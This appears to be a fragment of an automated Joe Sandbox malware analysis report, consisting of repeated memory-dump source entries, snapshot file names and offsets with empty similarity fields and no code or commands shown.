                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%